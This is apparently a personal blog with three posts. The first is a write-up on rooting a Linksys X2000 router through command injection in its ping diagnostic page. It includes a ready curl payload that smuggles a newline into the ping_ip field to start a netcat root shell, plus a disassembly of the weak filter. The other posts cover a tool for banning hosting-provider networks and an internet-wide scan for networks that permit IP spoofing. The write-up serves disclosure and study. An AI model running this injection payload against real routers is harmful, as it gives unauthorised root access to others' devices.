Sunday, 1 November 2015

Rooting the Cisco Linksys x2000 router: system() strikes again

EDIT:
This appears to be a security vulnerability, even a remote one if you have remote management active, because you don't need authentication to access the URL. I will leave the post as is, with the wrong info that you need your web admin account/password.

TL;DR

While related (for the same code quality of the firmware in question) to the flaw exploited by the "The Moon" malware, this is a different issue. More at the end of the post.

Open a shell, run these commands:

#fixup for your particular setup
user="web_admin_user"
password="web_admin_password"
router_ip="192.168.1.1"
#activate the shell
curl -s --basic -u "$user:$password" \
  --data submit_button=Diagnostics \
  --data change_action=gozila_cgi \
  --data submit_type=start_ping \
  --data action= \
  --data commit=0 \
  --data nowait=1 \
  --data ping_size=32 \
  --data ping_times=5 \
  --data-urlencode ping_ip=$'\nbusybox\tnc\t-e\t/bin/sh\t-l\t-p\t1234' $router_ip/apply.cgi >/dev/null &
#access the shell
nc $router_ip 1234

Do remember to finish your nc session with exit, or the web interface may get stuck.

Long story


My router is a Linksys x2000. The other day I grabbed the firmware from the producer website and unpacked the root file system it with a certain amount of manual fiddling, aided by binwalk and firmware-mod-kit and the information in the OpenWrt wiki.

The software that my router is running isn't particularly interesting, except for the usual weirdness of embedded low-cost appliances. The system is built on BusyBox, which acts as init as well. System initialization is done in /etc/profile, which loads a bunch of modules and starts program smd. I am not sure what this program does, but eventually it also starts /bin/httpd. This program manages the web interface. Web pages are some sort of Asp. I'm not sure if this is the standard for Asp web applications, but the pages seem to access native functions and data by calling native code that is compiled directly into the /bin/httpd executable.

So my original idea was to modify the root file system and inject some code in some script that would open a remote shell for me, and flash it on the device. However, the web interface has a "Diagnostic" page where you can ping arbitrary addresses:


I guessed that the web interface eventually calls the ping program, because nobody really knows how to write a program that sends ICMP packets, and that, given the generic sloppiness of firmwares, the string that one inputs in the IP field isn't properly sanitized.

This guess can be easily tested by inputing strings with spaces or other special shell characters. The first one that revealed interesting output is `echo`. Such "address" outputs this:


So indeed ` is not stripped, which means that most probably /bin/httpd appends `echo` to ping, and runs it as a shell command, probably through system(). However, commands that contain spaces or ; are truncated. strings /bin/httpd also shows a confirming hint: "/bin/ping -f -c %u -s %u %s > /tmp/ping_log 2>&1 &"

Now peeking at the disassembly of /bin/httpd, here is where the IP string is loaded and sanitized:

 LOAD:00420D9C         la   $a1, 0x490000  
 LOAD:00420DA0         la   $t9, cgiGetValueByNameSafe  
 LOAD:00420DA4         addiu  $s1, $sp, 0x238+var_198  
 LOAD:00420DA8         addiu  $a1, (aPing_ip - 0x490000) # "ping_ip"  
 LOAD:00420DAC         move  $a2, $zero  
 LOAD:00420DB0         move  $a3, $s1  
 LOAD:00420DB4         move  $a0, $s4  
 LOAD:00420DB8         jalr  $t9 ; cgiGetValueByNameSafe  
 LOAD:00420DBC         sw   $s3, 0x238+var_228($sp)  
 LOAD:00420DC0         lw   $gp, 0x238+var_220($sp)  
 LOAD:00420DC4         move  $a0, $s1  
 LOAD:00420DC8         la   $t9, strchr  
 LOAD:00420DCC         jalr  $t9 ; strchr  
 LOAD:00420DD0         li   $a1, 0x20  
 LOAD:00420DD4         beqz  $v0, loc_420DE0  
 LOAD:00420DD8         lw   $gp, 0x238+var_220($sp)  
 LOAD:00420DDC         sb   $zero, 0($v0)  
 LOAD:00420DE0  
 LOAD:00420DE0 loc_420DE0:               # CODE XREF: do_arc_Diagnostics+AC↑j  
 LOAD:00420DE0         la   $t9, strchr  
 LOAD:00420DE4         move  $a0, $s1  
 LOAD:00420DE8         jalr  $t9 ; strchr  
 LOAD:00420DEC         li   $a1, 0x3B  
 LOAD:00420DF0         beqz  $v0, loc_420DFC  
 LOAD:00420DF4         lw   $gp, 0x238+var_220($sp)  
 LOAD:00420DF8         sb   $zero, 0($v0)  
 LOAD:00420DFC  
 LOAD:00420DFC loc_420DFC:               # CODE XREF: do_arc_Diagnostics+C8↑j  
 LOAD:00420DFC         la   $t9, strchr  
 LOAD:00420E00         move  $a0, $s1  
 LOAD:00420E04         jalr  $t9 ; strchr  
 LOAD:00420E08         li   $a1, 0x3C  
 LOAD:00420E0C         beqz  $v0, loc_420E18  
 LOAD:00420E10         lw   $gp, 0x238+var_220($sp)  
 LOAD:00420E14         sb   $zero, 0($v0)  
 LOAD:00420E18  
 LOAD:00420E18 loc_420E18:               # CODE XREF: do_arc_Diagnostics+E4↑j  
 LOAD:00420E18         la   $t9, strchr  
 LOAD:00420E1C         move  $a0, $s1  
 LOAD:00420E20         jalr  $t9 ; strchr  
 LOAD:00420E24         li   $a1, 0x3E  
 LOAD:00420E28         beqz  $v0, loc_420E34  
 LOAD:00420E2C         lw   $gp, 0x238+var_220($sp)  
 LOAD:00420E30         sb   $zero, 0($v0)  

So the string is loaded, and then it is truncated at the first occurrence of any of " ;<>". This is a extraordinarily bad way to sanitize a shell argument, because spaces can usually be replaced with tabs, and semicolons for commands separation with new lines. Redirection can be emulated as well with eval I suppose, but I didn't test that.

The command at the top of this post effectively runs these commands on the router:

/bin/ping -f -c 5 -s 32
busybox nc -e /bin/sh -l -p 1234 > /tmp/ping_log 2>&1 &

And this effectively gives you a root access.

Relationship with "The Moon" malware


Looking at the actions take by "The Moon", it seems to me that in recent firmwares (I have the latest for my device) the upstream has "fixed" the issue by just disallowing some characters, but not solving the issue at the root. I would like to hear out from anyone who has some knowledge about vulnerable versions of Linksys firmwares if the function that I analyzed in this post did not have this characters blacklisting, which would confirm my guess.

Monday, 12 January 2015

ASkidban: ban VPN providers using Autonomous Systems data

If you are an operator of a FPS game server, it's likely that you often incur in this tiring routine.
Somebody cheats, and you need to determine the IP range to ban. You start by looking at the WHOIS data, and you immediately realize that they guy was connecting from some hosting provider, and either he lives in a datacenter or he was using a proxy, the second option being more likely. You rage because it would have been so nice to have this datacenter range banned, or even better the whole organization, as there is no good reason to use proxies in a low latency game such a FPS. However, it seems there is no public list of hosting providers (where VPNs/proxies are likely to be located) and their associated IP ranges, even though it would be relatively easy to compile one.

I decided to fill the gap with ASkidban. The name comes from a previous failed project of mine, kidban, which in turn is a reference to the fact that proxied cheaters in online FPS servers are likely to be lonely kids.

ASkidban is a tool written in Lua to help in the manual review of Autonomous Systems (AS) information, in order to tag them as sirs (good, such as an ADSL or cable TV provider) or kids (hosting provider, business IP transit services, etc). Working with AS numbers (ASN) is desirable because there is generally a direct correlation to the kind of business the AS runs, and it rarely changes significantly in time. The IP ranges associated to an ASN can be fetched from looking glass servers, which are inherently very accurate and up to date, much more than the WHOIS of an IP.

This is the list that I manage on my own (use at your own risk, this is WIP). As of now I'm banning close to 200 AS, for ~27 million IPs. Here is a sample of the organizations that are banned:

For more information, RTFM.

Wednesday, 1 October 2014

Scan the internet for Autonomous Systems that can perform IP spoofing

I have always been interested in IP spoofing. I would say it's something "elegant", and it's a neat way to show how the Internet works, or rather how there are some inherent flaws with it. My greatest geek pride is a hack based on IP spoofing and source IP-port guessing, that allowed me to make players shit carrots while walking.


Unfortunately, IP spoofing enables shitkids to have in the virtual world the leverage they don't have in real life, and I'm talking about DDOS attacks. Lately I've been involved in protecting the very same game that I hacked against this kind of attacks. And of course I couldn't miss experimenting in the other side of the front.

What and How

Performing IP spoofing requires a machine in an AS that allow such packets to be effectively sent out of its network. Finding one of these is no more a trivial task as it was years ago, and the knowledge of which providers allow that is usually not accessible for free. There are some places where you can find the worst scum of internet, and rent services from these fishy individuals, but it's usually a very unpleasing experience if you are there just for the sake of knowledge. So I started thinking how I could harvest for this kind of AS.

My idea is pretty simple:
  • pick a protocol that causes one query packet to be answered with an answer with controllable payload
  • force the above-mentioned payload to be the destination IP (the "visible global IP" of the host) of the query packet
  • inspect the response and check for weird mismatches between the payload and the source address.
It is true that the source address should match the payload even in AS that allows IP spoofing, but my worldwide scan shows that there is a lot of hosts that send out the weirdest shit, because connection tracking, NAT or routing altogether is not properly configured. And this post is exactly about these results.

Implementation

First guess for the protocol? ICMP ping. Universal, reliable as the query payload is transmitted back as is, and generally not filtered.
I wrote my own simple C++ program that pings the internet in a pseudo random order, so that a single target network doesn't get a sudden spike of traffic (just like other tools do), and the result gathering was just tcpdump and some awkward bash scripts. I'm not going to share the code because I don't want lamers to gain from my ideas without effort, and also because I simply lost it. I decided to limit the results to host that sent non-globally routable source addresses, as there is no chance to incur in false positives: a simple mismatch of the payload and the source address is most probably caused by bad connection tracking and hosts with multiple network interfaces.
If you attempt to reproduce these results, be aware of two things. First you'll get abuse complaints, even for a ping scan, that has had no known vulnerabilities in the last 30 years I think. American university networks seem to be the most hysterical, and I would like to have a word about that in another future rant post. Second, I used a machine in a hosting provider which has different datacenters, and of the two that I tried only one was capable of receiving replies with weird invalid source addresses.

Results

Here is a plot of the raw number of hits for reserved IP classes.


Judge yourself. I find this rather amusing.
One remarkable thing is the complete lack of 127.0.0.0/8, which every host should have attached to the loopback interface. In my opinion, this is due to the fact that a packet with this source address would need to be originated from the loopback interface, and at least the linux kernel seems to have hardcoded behaviors that make the packet "stick" to the interface (that is even policy based routing is ignored and the packet is directly looped to the host).

I'm not going  to provide the raw capture files, so don't bother asking.


EDIT

Thanks to user dzrtguy on reddit that reminded me of the existence of bogons. I included them in the graph even though it doesn't strictly mean that these AS allow spoofing. Also beware that I ran this scan in May 2014, and I fetched the bogons list today October 1st, so there might be false positives or misses: the former is more likely as the bogon list should contain not yet assigned addresses.